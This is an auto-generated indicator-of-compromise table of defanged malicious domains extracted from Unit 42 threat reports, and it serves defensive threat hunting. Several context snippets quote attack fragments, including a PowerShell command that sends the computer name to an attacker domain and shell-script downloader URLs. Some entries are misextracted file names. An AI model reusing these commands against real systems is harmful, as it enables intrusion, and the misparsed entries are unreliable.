ZeroHour

Indicators of compromise

1,890 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domainffconnectivitycheck.com/2018 DNSpionage Campaign 185.174.101[.]66 8/6/2018 Oilrig (ffconnectivitycheck[.]com) 185.174.101[.]68 2/14/2019 DNSpionage Campaign 199.247.3xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainfirewallsupports.comta (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[.xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domaingoogie.emailorts[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[.]email) 91.132.139[.]200 4/16/2019, 5/12/2019 Newly identified DxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domaingoogle-update.comdate[.]com) 104.168.244[.]213 7/15/2019 - 7/18/2019 Hisoka (google-update[.]com) Additional Resources xHunt Campaign: xHunt Actor’s CheatxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainlearn-service.comeferenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As of January 2020, this image is no loxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainlowconnectivity.com2018 DNSpionage Campaign 185.161.211[.]86 10/4/2018 Oilrig (lowconnectivity[.]com) 185.161.209[.]147 11/28/2018 Widespread DNS Hijacking AcxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainmicrosofte-update.comure. Beginning in May 2019, the image referenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As oxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainsakabota.comresolution of interest is with the Sakabota related domain sakabota[.]com . This domain resolved to the IP address 185.15.247[.]140xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainzombsroyale.ioActivity 199.247.3[.]186 - 198 5/6/2018 - 8/30/2018 Chafer (zombsroyale[.]io) 213.202.217[.]31 7/6/2018 Newly identified DNS redirectxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainafsasdfa33.xyzname " #Start-sleep -s 10 Invoke-WebRequest -Uri " http : //afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername" $ f = get - contentCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainexemsi.comD22A040A ) was built using an unregistered version from www.exemsi[.]com with the title of MPZMZQYVXO patch version 5.1 . This verCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainnetsupportsoftware.comentationhost.exe ) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP PCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainprotonmail.comor print industry. All emails were also sent using a random protonmail[.]com email address and contained email subjects related to refCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainquickwaysignstx.com> % temp % \ alpaca . bat &EcHo | s ^ et / p = " http^:^/^/^quickwaysignstx[.]com/view.php " > > % temp % \ alpaca . bat &EcHo | s ^ et / pCortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT
Palo Alto Unit 42
· Aug 17, 2026
domainapi.ipify.orgitimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.Threat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domaincheckip.amazonaws.comy be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazipThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainicanhazip.comazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by TrThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainip.anysrc.netk: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternaliThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainipecho.netfollowing legitimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.Threat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainipinfo.iocheckip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate doThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainmyexternalip.com[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by Trickbot Anchor_DNS mThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainwtfismyip.comi[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. LThreat Assessment: Ryuk Ransomware
Palo Alto Unit 42
· Aug 17, 2026
domainkomaru.todayiguration decode function. After decoding its C2 server vpn.komaru[.]today from configuration, MooBot will send out a message to infMirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
domainwget.shompromised system and renames the binary files to Realtek . wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07Mirai Variant MooBot Targeting D
Palo Alto Unit 42
· Aug 17, 2026
domaincloudfusion.me1, we can extract the collection server of the web skimmer: cloudfusion[.]me . This web skimmer is simple, yet classic. It checks whetTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainmisuperblog.comare traffic based on another similar request to the URL www.misuperblog[.]com/tmz/?sRjPP6ZH=21Ru2Nt5y6IynFa8dNKfckGmLKuTraB2ebSZxsJ3CJwTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainvoques-tfr.xyzfb11f468a1f ). They connect to these IPs through the domain voques-tfr[.]xyz . Although this domain is not resolvable anymore, we analTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainyhys93.siteed JS that triggers several redirects to an adult website ( yhys93[.]site ). Conclusion As we highlighted in this blog, this quarteTrends in Web Threats: Old Web Skimmer Still Active Today
Palo Alto Unit 42
· Aug 17, 2026
domainjs.digestcolect.comlicious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. DeobfusTrends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
Palo Alto Unit 42
· Aug 17, 2026
domainstat.trackstatisticsss.comrain[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. Deobfuscated source code of a malicious inTrends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
Palo Alto Unit 42
· Aug 17, 2026
domaintrain.developfirstline.comclicked. We identified several malicious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
Palo Alto Unit 42
· Aug 17, 2026
domain8x19.comicators of Compromise Infrastructure Malware C2 comeanalyze.8x19[.]com Malware Host 176.123.9[.]238 198.98.49[.]79 104.244.72[.]Mirai Variant V3G4 Targets IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
domaingatemotor.php[.]com/motor[.]js Collection server personallydeliver[.]com/gatemotor[.]phpRecent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More
Palo Alto Unit 42
· Aug 17, 2026
domainmotor.js6. A screenshot of the source code of personallydeliver.com/motor[.]js . After deobfuscating the JS code in motor.js and takingRecent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More
Palo Alto Unit 42
· Aug 17, 2026
domainpersonallydeliver.comas shown in Figure 15. Figure 15. VirusTotal screenshot of personallydeliver[.]com . The original web skimmer in motor.js is not straightforRecent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More
Palo Alto Unit 42
· Aug 17, 2026
domaindotheneedfull.cluband those botnet client samples would contact the C2 domain dotheneedfull[.]club . Malware Analysis Based on behavior and patterns Unit 42Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
domainlolol.shmples that hosted two shell scripts: hxxp://31.210.20[.]100/lolol[.]sh hxxp://212.192.241[.]72/lolol[.]sh The shell script downlOld Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Palo Alto Unit 42
· Aug 17, 2026
domainzvub.usoad a shell script downloader as a file named y from hxxp://zvub[.]us/ . If executed, the shell script downloader would downloaIoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Palo Alto Unit 42
· Aug 17, 2026
domainwatchtowr.coms of long, randomly generated subdomains under dns.outbound.watchtowr[.]com : execSinet:gethostbyname("d0am3pi3pgl6h3t9mkp0qt3zn9p1izKeys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild
Palo Alto Unit 42
· Aug 17, 2026
domainfile.exe/lat3st/w0rld/systemupdateAPI[.]exe newsumbrella[.]net/ne3s/file[.]exe – hosted earlier We believe that the executables hosted uNew Malware 'Rover' Targets Indian Ambassador to Afghanistan
Palo Alto Unit 42
· Aug 17, 2026
domainnewsumbrealla.netfile systemupdateAPI.exe was no longer being hosted on the newsumbrealla[.]net domain. However, we have noticed the same domain hostingNew Malware 'Rover' Targets Indian Ambassador to Afghanistan
Palo Alto Unit 42
· Aug 17, 2026
domainnewsumbrella.netile exploits CVE-2010-3333 and downloads an executable from newsumbrella[.]net. The executable file downloaded from newsumbrella[.]net iNew Malware 'Rover' Targets Indian Ambassador to Afghanistan
Palo Alto Unit 42
· Aug 17, 2026
domainsystemupdateapi.exefolders as shown below newsumbrella[.]net/ne3s/lat3st/w0rld/systemupdateAPI[.]exe newsumbrella[.]net/ne3s/file[.]exe – hosted earlier We beNew Malware 'Rover' Targets Indian Ambassador to Afghanistan
Palo Alto Unit 42
· Aug 17, 2026
domainnewspot.krnd starts getting configuration from the following URL: www.newspot[.]kr/config.php?sUID=[web site name] It downloads a file fromKRBanker Targets South Korea Through Adware and Exploit Kits
Palo Alto Unit 42
· Aug 17, 2026
domainbbs.softfix.cob181757b3309995acd1f92e0f63f888aa89423). Another subdomain, bbs.softfix.co[.]kr was hosted on same IP address as bbs.gokickes[.]com, w“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainblog.softfix.cog: Executable files that connect to the same remote server, blog.softfix.co[.]kr:80, download a DLL file and execute the 'lowmain' expo“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainblogspot.hkDME.md http://www.ak(masked)[.]jp/images/ http://elsakrblog.blogspot[.]hk/2017/03/test.html C2 115.68.49[.]179:80 115.68.49[.]179:4UBoatRAT Navigates East Asia
Palo Alto Unit 42
· Aug 17, 2026
domainco.krfiles that connect to the same remote server, blog.softfix.co[.]kr:80, download a DLL file and execute the 'lowmain' export“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domaingithubusercontent.comsted on Github, using a URL like the following: https://raw.githubusercontent[.]com/r1ng/news/master/README.md The malware accesses the URL aUBoatRAT Navigates East Asia
Palo Alto Unit 42
· Aug 17, 2026
domaingmarketshop.net50df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 C2 lywjrea.gmarketshop[.]net krjregh.sacreeflame[.]com psfir.sacreeflame[.]com lywja.h“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domaingokickes.comn, bbs.softfix.co[.]kr was hosted on same IP address as bbs.gokickes[.]com, which was reported as the C2 server of Invader by Cyphor“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainhealthsvsolu.comservices in 2008 and 2011. krjregh.sacreeflame[.]com lywja.healthsvsolu[.]com Though we don't know the targets of these malware samples“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainjpn.comoftfix.co[.]kr www.gokickes[.]com log.gokickes[.]com sansei.jpn[.]com“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainnews.softfix.cosoftfix.co[.]kr was registered in 2014. One of subdomains, news.softfix.co[.]kr was the C2 server of Daserf (SHA256: 9c7a34390e92d4551“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainsacreeflame.comh the privacy protection services in 2008 and 2011. krjregh.sacreeflame[.]com lywja.healthsvsolu[.]com Though we don't know the targets“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainsoftfix.coRAT has been used by multiple actors for years. The domain, softfix.co[.]kr was registered in 2014. One of subdomains, news.softfi“Tick” Group Continues Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainenglandprevail.comalicious files from the remote C2 server; in this case, pre.englandprevail[.]com. Trojanized Legitimate Software SHA256 Movie Player instaTick Group Weaponized Secure USB Drives to Target Air
Palo Alto Unit 42
· Aug 17, 2026
domaindynssl.coms by using the HTTP POST method on TCP port 443. kted56erhg.dynssl[.]com euiro8966.organiccrap[.]com These domains are provided byBisonal Malware Used in Attacks Against Russia and South Korea
Palo Alto Unit 42
· Aug 17, 2026
domainlookin.at71e01fb2aa2856f230943460e14e19183a6 XOR YES YES jennifer998.lookin[.]at, 196.44.49[.]154 2014 South Korea 0919-1 dfa1ad6083aa06b8Bisonal Malware Used in Attacks Against Russia and South Korea
Palo Alto Unit 42
· Aug 17, 2026
domainmy-homeip.comr with the same key “78563412”. It connects to hxxp://games.my-homeip[.]com:443/ks8d[ip address]akspbu.txt by using the HTTP POST metBisonal Malware Used in Attacks Against Russia and South Korea
Palo Alto Unit 42
· Aug 17, 2026
domainorganiccrap.comT method on TCP port 443. kted56erhg.dynssl[.]com euiro8966.organiccrap[.]com These domains are provided by a free DDNS service and botBisonal Malware Used in Attacks Against Russia and South Korea
Palo Alto Unit 42
· Aug 17, 2026
domaintempors.com6FC C2: jennifer998.lookin[.]at 196.44.49[.]154 www.hosting.tempors[.]com kted56erhg.dynssl[.]com euiro8966.organiccrap[.]com 116.1Bisonal Malware Used in Attacks Against Russia and South Korea
Palo Alto Unit 42
· Aug 17, 2026
domainjma-go.jpn Smoke Loader contains the following hardcoded C2 address. jma-go[.]jp/js/metrology/jma.php An outline of initial C2 communicatiAnalysis of Smoke Loader in New Tsunami Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainmountainhigh.at5e47fbfff4786eada6cbcb0805ed79d9bd417955c016236143eb2ecd827 Mountainhigh[.]at 75edaae605622e056a40c2d8a16b86654d7ddc772f12c4fc64292a32aAnalysis of Smoke Loader in New Tsunami Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainracemodel.atae605622e056a40c2d8a16b86654d7ddc772f12c4fc64292a32a96fde7a Racemodel[.]at 55ae2b00234674d82dcc401a0daa97e7b3921057a07970347815d9c50Analysis of Smoke Loader in New Tsunami Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainsungmap.atre yet. Following is the sample list. Domain Marcher SHA256 Sungmap[.]at 254925e47fbfff4786eada6cbcb0805ed79d9bd417955c016236143ebAnalysis of Smoke Loader in New Tsunami Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainthunderbolt-price.com. The attacker distributes those files from following URLs. thunderbolt-price[.]com/Art-and-Jakes/Coupon.scr bite-me.wz[.]cz/1.exe thunderbolAnalysis of Smoke Loader in New Tsunami Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainwz.czs. thunderbolt-price[.]com/Art-and-Jakes/Coupon.scr bite-me.wz[.]cz/1.exe thunderbolt-price[.]com was registered in 2012 in JAnalysis of Smoke Loader in New Tsunami Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainbeta.officopedia.comrvice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]brTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainblogsite.org1f5a9b2d59b08500882563011d1def2b8d0b1b9bbb8ae C2: theme[[.]]blogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]winTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domaincheck.homeip.netn[.]com syn[.]servebbs[.]com service[.]windown-update[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net oTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domaincheck.webhop.orgdns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristineho[.]com Appendix A: Cobalt Strike Beacon contaiTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domaincortana.homelinux.com0882563011d1def2b8d0b1b9bbb8ae C2: theme[[.]]blogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]windownoffice[.]com cortanaTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domaincortanasyn.comfrom the following remote location and executes it: https://cortanasyn[.]com/Avcv The fourth shellcode loads the embedded Cobalt StrikTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domaincortanazone.com.]net mail[.]fptservice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.]Tracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domaine.browsersyn.com.]webhop[.]info work[.]windownoffice[.]com cortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.]com service[.]windown-update[.]com cheTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainmail.fptservice.nette[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.]Tracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainoffice.windown-update.com.]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dynTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainoutlook.updateoffices.nets[.]com service[.]windown-update[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net office[.]windown-update[.]com cTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainristineho.comerveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristineho[.]com Appendix A: Cobalt Strike Beacon contains the hard-codedTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainservebbs.commachine. OS A rchitecture URL User Agent 32 bit https://syn.servebbs[.]com/kuss32.gif Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:6Tracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainservice.serveftp.orgnazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristinehoTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainservice.windown-update.comcortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.]com service[.]windown-update[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mailTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainsyn.browserstime.comopedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristineho[.]com Appendix A: CobaltTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainsyn.servebbs.com.]windownoffice[.]com cortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.]com service[.]windown-update[.]com check[.]homeip[.]net outTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainvideos.dyndns.orgown-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com checkTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainword.webhop.infob8ae C2: theme[[.]]blogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]windownoffice[.]com cortanasyn[.]com e[.]browserTracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainwork.windownoffice.comogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]windownoffice[.]com cortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.]Tracking OceanLotus’ new Downloader, KerrDown
Palo Alto Unit 42
· Aug 17, 2026
domainad-blocking24.netaffic forwarded to adware tracker-tds[.]info jpadsnow[.]com ad-blocking24[.]net Myqenad24[.]com PUP download example: bd62d3808ef29c557daApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainallureoutlayterrific.come99 artificius[.]com Other campaign domains: hoanoola[.]net allureoutlayterrific[.]com Acknowledgements We’d like to thank the entire Unit 42 teApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainartificius.coms unwanted redirects. This browser opens its own website at artificius[.]com when victims open a new tab or window. Figure 10 illustraApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainexperttrafficmonitor.comeck[.]com hightrafficcounter[.]com proftrafficcounter[.]com experttrafficmonitor[.]com IP addresses hosting campaign entry point 192[.]243[.]59[ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainfeaturesscanner.comnce . Indicators of Compromise Campaign entry point example featuresscanner[.]com Domains part of centralized infrastructure to track victiApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainhightrafficcounter.comcontact the centralized server. professionalswebcheck[.]com hightrafficcounter[.]com proftrafficcounter[.]com experttrafficmonitor[ . ]com ForApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainhoanoola.nete5128c96f2ff5b5e99 artificius[.]com Other campaign domains: hoanoola[.]net allureoutlayterrific[.]com Acknowledgements We’d like toApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainjpadsnow.comic forwarded to adware sites such as tracker-tds[.]info and jpadsnow[.]com . The redirection URL includes several parameters to sharApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainmyqenad24.comdware tracker-tds[.]info jpadsnow[.]com ad-blocking24[.]net Myqenad24[.]com PUP download example: bd62d3808ef29c557da64b412c4422935a6ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainprofessionalswebcheck.comrecently rotated through to contact the centralized server. professionalswebcheck[.]com hightrafficcounter[.]com proftrafficcounter[.]com experttApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainproftrafficcounter.comerver. professionalswebcheck[.]com hightrafficcounter[.]com proftrafficcounter[.]com experttrafficmonitor[ . ]com For example, the campaign coApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026
domaintracker-tds.infoe saw examples of traffic forwarded to adware sites such as tracker-tds[.]info and jpadsnow[.]com . The redirection URL includes severalApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign
Palo Alto Unit 42
· Aug 17, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.